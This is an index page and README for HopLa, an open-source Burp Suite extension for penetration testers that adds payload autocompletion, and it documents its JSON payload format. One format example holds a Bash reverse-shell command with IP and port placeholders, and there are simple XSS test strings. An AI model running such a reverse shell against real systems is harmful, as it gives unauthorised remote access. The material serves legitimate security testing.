Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/synacktiv/HopLa
HopLa Burp Suite Extender plugin - Adds autocompletion support and useful payloads in Burp Suite
burp burp-extensions burp-plugin burp-suite burp-ui
Last synced: 24 days ago
- Host: GitHub
- URL: https://github.com/synacktiv/HopLa
- Owner: synacktiv
- License: bsd-3-clause
- Created: 2021-05-06T11:01:23.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2021-05-12T16:24:50.000Z (over 3 years ago)
- Last Synced: 2024-08-04T00:06:23.348Z (4 months ago)
- Topics: burp, burp-extensions, burp-plugin, burp-suite, burp-ui
- Language: Java
- Homepage:
- Size: 272 KB
- Stars: 614
- Watchers: 13
- Forks: 71
- Open Issues: 4
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-burp-extensions - HopLa - This extension adds autocompletion support and useful payloads in Burp Suite to make your intrusion easier. (Payload Generators and Fuzzers / SSRF)
- awesome-hacking-lists - synacktiv/HopLa - HopLa Burp Suite Extender plugin - Adds autocompletion support and useful payloads in Burp Suite (Java)
README
# HopLa
💥 All the power of PayloadsAllTheThings, without the overhead.
This extension adds autocompletion support and useful payloads in Burp Suite to make your intrusion easier.
Feel free to improve with your payloads! ❤️
Developed by Alexis Danizan [![Twitter Follow](https://img.shields.io/twitter/follow/alexisdanizan?style=social)](https://twitter.com/alexisdanizan/)
Released as open source by [Synacktiv 🥷](https://www.synacktiv.com/)
![Demo GIF](img/demo.gif)
## Getting started
### Installation
* Download the jar file from the release directory
* Add it to Burp Suite using the Extender tab
### Build
Execute `gradle build` and you'll have the plugin ready in `releases/HopLa.jar`.
## Usage
HopLa ships with a set of default payloads. You can add your own by loading a custom JSON file from the menu.
On first use, HopLa creates a JSON file containing all the payloads in the jar file directory.
Press `Ctrl+Q` to display the payload library menu.
You can disable the global autocompletion in the top menu.
For i3, add the following line to `$HOME/.config/i3/config` to make the frame floating:
```
for_window [class=".*burp-StartBurp.*" title="^ $"] floating enable
```
### How to add payloads
The JSON payloads file follows this structure:
```json
{
    "categories": [
        {
            "name": "XSS",
            "values": [
                {
                    "name": "Simple",
                    "value": "alert(1)"
                },
                {
                    "name": "Multiline",
                    "value": "AAAA\nBBBB"
                },
                {
                    "name": "Nested XSS menu",
                    "values": [
                        {
                            "name": "Simple 2",
                            "value": "alert(1)"
                        }
                    ]
                }
            ]
        }
    ],
    "keywords": [
        {
            "name": "Headers",
            "values": [
                "X-Forwarded-For",
                "X-Originally-Forwarded-For",
                "X-Originating-Ip",
                "X-Originating-IP"
            ]
        }
    ]
}
```
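A custom file can be linted before it is loaded through the menu. The sketch below is an added example, not HopLa's own loader: the rules it enforces are inferred from the examples in this README (including the `prompt` list and the `keywords` section), and the function names and sample data are constructed.

```python
import json
import re

MARKER = re.compile(r"§([^§]+)§")  # §NAME§ markers, as in the README's prompt example
# Constructed sample: "Ping" uses §PORT§ without declaring it; one keyword is not a string.
SAMPLE = """{"categories": [{"name": "Demo", "values": [
  {"name": "Plain", "value": "hello"},
  {"name": "Sub", "values": [
    {"name": "Ping", "value": "ping §HOST§ -p §PORT§", "prompt": ["HOST"]}]}]}],
 "keywords": [{"name": "Headers", "values": ["X-Forwarded-For", 42]}]}"""

def check_entry(entry, path, errors):
    """Check one menu entry: a payload (string "value") or a submenu (list "values")."""
    if not isinstance(entry, dict) or not isinstance(entry.get("name"), str):
        errors.append(f"{path}: entry must be an object with a string 'name'")
        return
    here = f"{path}/{entry['name']}"
    if isinstance(entry.get("values"), list):      # submenu: recurse, no depth limit
        for child in entry["values"]:
            check_entry(child, here, errors)
    elif isinstance(entry.get("value"), str):      # leaf payload
        prompt = entry.get("prompt", [])
        if not (isinstance(prompt, list) and all(isinstance(p, str) for p in prompt)):
            errors.append(f"{here}: 'prompt' must be a list of strings")
            return
        used = set(MARKER.findall(entry["value"]))
        # Assumed rule: every §NAME§ marker is declared in 'prompt' and vice versa.
        for name in sorted(used ^ set(prompt)):
            errors.append(f"{here}: {name} is in only one of 'value' and 'prompt'")
    else:
        errors.append(f"{here}: needs a string 'value' or a list 'values'")

def validate_payload_file(text):
    """Return a list of problems in a HopLa-style payload file (empty when clean)."""
    try:
        doc = json.loads(text)
    except json.JSONDecodeError as exc:
        return [f"invalid JSON: {exc}"]
    if not isinstance(doc, dict) or not all(
            isinstance(doc.get(k, []), list) for k in ("categories", "keywords")):
        return ["expected an object whose 'categories'/'keywords' are lists"]
    errors = []
    for category in doc.get("categories", []):
        check_entry(category, "categories", errors)
    for i, group in enumerate(doc.get("keywords", [])):
        values = group.get("values") if isinstance(group, dict) else None
        if not (isinstance(values, list) and all(isinstance(v, str) for v in values)):
            errors.append(f"keywords[{i}]: 'values' must be a list of strings")
    return errors
```

Calling `validate_payload_file(SAMPLE)` reports the undeclared `PORT` marker and the non-string keyword; a clean file returns an empty list.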
There is no nesting limit.

You can automatically add a prompt dialog:
```json
{
    "name": "Bash UDP",
    "value": "sh -i >& /dev/udp/§IP§/§PORT§ 0>&1",
    "prompt": ["IP", "PORT"]
}
```
To add keywords that are autocompleted but do not appear in the menu, put them in the `keywords` section:
```json
{
    "keywords": [
        {
            "name": "Headers",
            "values": [
                "X-Forwarded-For",
                "X-Originally-Forwarded-For",
                "X-Originating-Ip",
                "X-Originating-IP"
            ]
        }
    ]
}
```
## Roadmap
* Support custom key binding for payload menu
## Thanks To
* https://github.com/Static-Flow/BurpSuiteAutoCompletion
* https://github.com/d3vilbug/HackBar
* https://github.com/swisskyrepo/PayloadsAllTheThings

Thanks a lot for your awesome work!
## License
Released under the BSD 3-Clause License; see LICENSE for more information.
Please feel free to report bugs, suggest features, or send pull requests.